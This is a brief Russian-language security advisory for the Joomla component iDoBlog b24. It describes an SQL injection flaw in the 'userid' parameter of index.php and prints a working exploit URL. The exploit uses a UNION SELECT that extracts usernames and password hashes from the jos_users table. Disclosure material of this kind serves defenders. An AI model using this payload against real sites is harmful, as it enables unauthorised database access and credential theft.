Программа: Joomla Component iDoBlog b24
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «userid» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
index.php?option=com_idoblog&task=userblog&userid={SQL}
/index.php?option=com_idoblog&task=userblog&userid=<valid_userid> and 1=1
UNION SELECT user(),user(),user(),user(),user(),concat(username,0x3a,password),
user(),user(),user(),user(),user(),user(),user(), user(),user(),user() FROM
jos_users--
